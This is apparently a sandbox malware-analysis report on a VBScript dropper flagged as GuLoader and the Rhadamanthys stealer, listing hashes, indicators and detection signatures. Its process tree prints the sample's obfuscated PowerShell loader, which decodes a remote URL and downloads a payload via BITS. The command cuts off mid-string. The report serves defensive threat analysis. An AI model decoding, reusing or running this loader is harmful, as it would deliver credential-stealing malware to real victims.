Edit tour
Windows
Analysis Report
F8HYX5HOgA.vbs
Overview
General Information
Sample name: | F8HYX5HOgA.vbsrenamed because original name is a hash value |
Original sample name: | ace5b87a91d37f57a3288800b585268dbc4c1efde0417521f98b1fd4b86beff1.vbs |
Analysis ID: | 1578227 |
MD5: | 85d4ef0ba65b5d677d8a3b3772542ea7 |
SHA1: | b73d4b3d582213d2d350a86603f6a3b1d60cce03 |
SHA256: | ace5b87a91d37f57a3288800b585268dbc4c1efde0417521f98b1fd4b86beff1 |
Tags: | 185-236-228-9287-120-112-91vbswww-al-rasikh-comuser-JAMESWT_MHT |
Infos: | |
Detection
GuLoader, RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5444 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\F8HYX 5HOgA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 5708 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "Function Krse ($Udr ensnri){Fo r($Holdk=7 ; $Holdk - lt $Udrens nri.Length -1; $Holdk +=8){ $bek raefte+=$U drensnri.S ubstring($ Holdk, 1); }$bekraeft e;}$bekrae fte01=Krse 'Unrelini SouffleRo vsedexHinc hmi ';$bek raefte02=K rse 'Allit teTLgninge r NonminaS norkelnDra wplasHydro stfCodific eAchiertrB indheirkar nevai Quad rinRegress gProphet ' ;function Fundmong ( $Avoutry){ . ($bekrae fte01) ($A voutry);}$ Jaspedam82 =Krse 'Cel ebrehStenk lvtDybdema t Expetips emidels Bl ackl: Beme st/Bromidi /CandollwP lateaswroc hetswDrtri nn.Referer aUtaethes SteurotFan tasteDalli annLeafeds tTilbageeH yperacrPre millp Oddf elrIronike iFunderes ForlageLoc omots nona ff.Subtota cVarmefroC reaminmPla typt.Forma tkplibidin kSandsyn/R ebozotmKim sendsBygni ng/Baggaar S OvertepK istegleUni nundjMeedf ul.Ideolog t TenuirtT uckykof Ov eren ';$be kraefte00= Krse 'appr oks$ Stern ngGynecoll RoofwisoTa ipoclbbeto nrkaLogope dlFloddel: BacilleCTr ansforKlem skruYnkvrd isPartakia Initiald K odifioDons kywvBloodt haTyggende Stykvr8no nvend Melo ne= Forste DecolonS AlphabtMin ikenaForha anrGeneral t Plasmo-I ndfrelBAvl sbruiDvrge flt Abdelr sNerviikTF orslver Pe deraa Subt ernHeadles s Hilsepf HundreeRsk nernr Unph il Rokkene -MystifiS OverfloFre mbriuEcono mir Signal cLuftrrbeV armeis Cro tche$Amtsk omJSiddeba aAssembls PlastipPar vifoe Tilt ogd Boundl aBestialmP emmica8Ang ribe2Toile tp encomi- ArveretDst uppeneBiba budsMotion etLandfogi Resentsnak tiekaaSupe rsatUnders tipathleto Sjllandnfo rlyst Prak tis$Sammen bCBeechamr IrongoluFu nestasSchl ossaPester sdJgerstuo NonprovNo npessaRati onae Cofou n2Spaecra ';Fundmong (Krse 'Om fangs$Tumu ltegGaards plPastiero Urbiaspbin dpakkaSymf onilafdrag s:AcolhuaC AfspndirCa rlineuMode llesFlgene saFalanksd BommenoKa ffetivMult iplaBekmpe lePerpetu2 Promisi=Im itato$Prod uktePurgat inIncomprv Sulfini: K artotaNoni ntepPersil lp Beaverd VildepraFo lacintFuge rsoaMispri s ') ;Fund mong (Krse 'AfbenytI FalderamSl ingrepturb ehsoCrypto hrPanicket Etagese-Ge ograpMUnar bitoUafvis ed Erstatu Biscayl P impere Par ado Outmar rBUntrammi Afgudentre sultasFler bruTStanse mrSvineava churnfunOp tjercsVedt agefRedeci deKikrterr Afhvlin ') ;$Crusado vae2=$Crus adovae2+'\ Notorhiza. Sal' ;Fund mong (Krse ' slambr$ DebusedgGl obatel Tel pheo Ansku ebFlagstra EbbcritlKo kseth:rred tekC limfa rrMslsveru RutsjesAa bjrnsaRest ipud Prefo co Candidv AgrarkoaDe spitoeDece ler7Mashal l=imperfo( GuslarpTLo vforbeGile norsChloro ptUnbelie- PleurahPPr easceaStil lelt Forkl ahMerceri Corrive$Au gustoCUdha mrircosmet euSelskabs Gallakla P illerdOpsa dleoRoseth avAntbirda Svingnietr awled2Hipp